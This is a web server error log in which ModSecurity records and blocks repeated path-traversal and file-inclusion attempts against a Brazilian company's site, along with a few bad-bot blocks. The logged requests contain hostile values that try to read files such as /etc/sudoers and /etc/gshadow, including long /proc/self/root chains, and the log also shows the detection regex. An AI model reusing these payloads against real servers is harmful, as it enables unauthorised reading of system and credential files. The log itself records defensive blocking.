[Wed Mar 18 04:30:35.051153 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:43904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUm-w_le52K8_3pV2mAwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:30:35.459461 2026] [mime_magic:error] [pid 11816:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:37910] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 04:30:38.999287 2026] [:error] [pid 19507:tid 140411565680384] [client 216.73.216.191:38048] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUntY0UrI5A3LftIxYJAAAAZU"]
[Wed Mar 18 04:30:39.399853 2026] [:error] [pid 30077:tid 140411733534464] [client 216.73.216.191:38084] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUn_u8EFLIOrSqIpvLiQAAAkE"]
[Wed Mar 18 04:30:41.023462 2026] [:error] [pid 17653:tid 140411716749056] [client 216.73.216.191:38190] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUocdf6f5d65gmYZSWfQAAAsM"]
[Wed Mar 18 04:30:41.743293 2026] [:error] [pid 15051:tid 140411691570944] [client 216.73.216.191:38234] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUoSmAPhZkrhU8w4kyyAAAAIY"]
[Wed Mar 18 04:30:48.798585 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:41084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUqNa6ubjKNq_cu4ZcFwAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:30:50.178988 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.241.31:35770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUquw_le52K8_3pV2mCgAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 04:31:18.076959 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.241.31:35784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUximAPhZkrhU8w4ky5gAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:31:23.285651 2026] [:error] [pid 15826:tid 140411716749056] [client 216.73.216.191:39362] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUy-oXxyEfFpUF8f8yAwAAAUM"]
[Wed Mar 18 04:31:23.659456 2026] [:error] [pid 17887:tid 140411632822016] [client 216.73.216.191:39384] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUywkwaGbbGflqUZDXugAAAM0"]
[Wed Mar 18 04:31:24.771474 2026] [:error] [pid 30077:tid 140411649607424] [client 216.73.216.191:39404] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUzPu8EFLIOrSqIpvLoAAAAks"]
[Wed Mar 18 04:31:25.075058 2026] [:error] [pid 15826:tid 140411599251200] [client 216.73.216.191:39476] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUzeoXxyEfFpUF8f8yCAAAAVE"]
[Wed Mar 18 04:31:26.191181 2026] [:error] [pid 17653:tid 140411733534464] [client 216.73.216.191:39548] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUzsdf6f5d65gmYZSWkgAAAsE"]
[Wed Mar 18 04:31:26.219983 2026] [:error] [pid 19507:tid 140411632822016] [client 216.73.216.191:39552] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUztY0UrI5A3LftIxYWgAAAY0"]
[Wed Mar 18 04:31:26.292099 2026] [:error] [pid 15826:tid 140411616036608] [client 216.73.216.191:39558] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUzuoXxyEfFpUF8f8yDAAAAU8"]
[Wed Mar 18 04:31:27.035774 2026] [:error] [pid 26799:tid 140411624429312] [client 216.73.216.191:39600] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUz9a6ubjKNq_cu4ZcMwAAA04"]
[Wed Mar 18 04:31:29.494466 2026] [:error] [pid 31803:tid 140411666392832] [client 216.73.216.191:39572] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpU0OyqAr6etmhZHNp_TAAAAEk"]
[Wed Mar 18 04:31:29.501787 2026] [:error] [pid 15826:tid 140411716749056] [client 216.73.216.191:39660] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpU0OoXxyEfFpUF8f8yEQAAAUM"]
[Wed Mar 18 04:31:30.929043 2026] [:error] [pid 11816:tid 140411632822016] [client 216.73.216.191:39776] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpU0uw_le52K8_3pV2mJAAAAg0"]
[Wed Mar 18 04:31:31.563082 2026] [:error] [pid 17887:tid 140411741927168] [client 216.73.216.191:39816] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpU0wkwaGbbGflqUZDXvwAAAMA"]
[Wed Mar 18 04:31:31.869943 2026] [:error] [pid 26799:tid 140411666392832] [client 216.73.216.191:39780] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpU09a6ubjKNq_cu4ZcOgAAA0k"]
[Wed Mar 18 04:31:34.167872 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:60386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpU1uyqAr6etmhZHNp_UgAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:32:08.804179 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.244.43:55186] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpU-Na6ubjKNq_cu4ZcbQAAA0Y"]
[Wed Mar 18 04:32:13.498750 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.228.61:54228] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpU_dY0UrI5A3LftIxYmAAAAY8"]
[Wed Mar 18 04:32:41.949193 2026] [:error] [pid 11816:tid 140411674785536] [client 216.73.216.191:41346] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpVGew_le52K8_3pV2mMAAAAgg"]
[Wed Mar 18 04:32:43.811949 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:52418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpVG9a6ubjKNq_cu4ZcoAAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:33:13.453932 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:51766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpVOcdf6f5d65gmYZSWzAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:34:06.839161 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:36448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpVbuoXxyEfFpUF8f8ylwAAAUg"], referer: 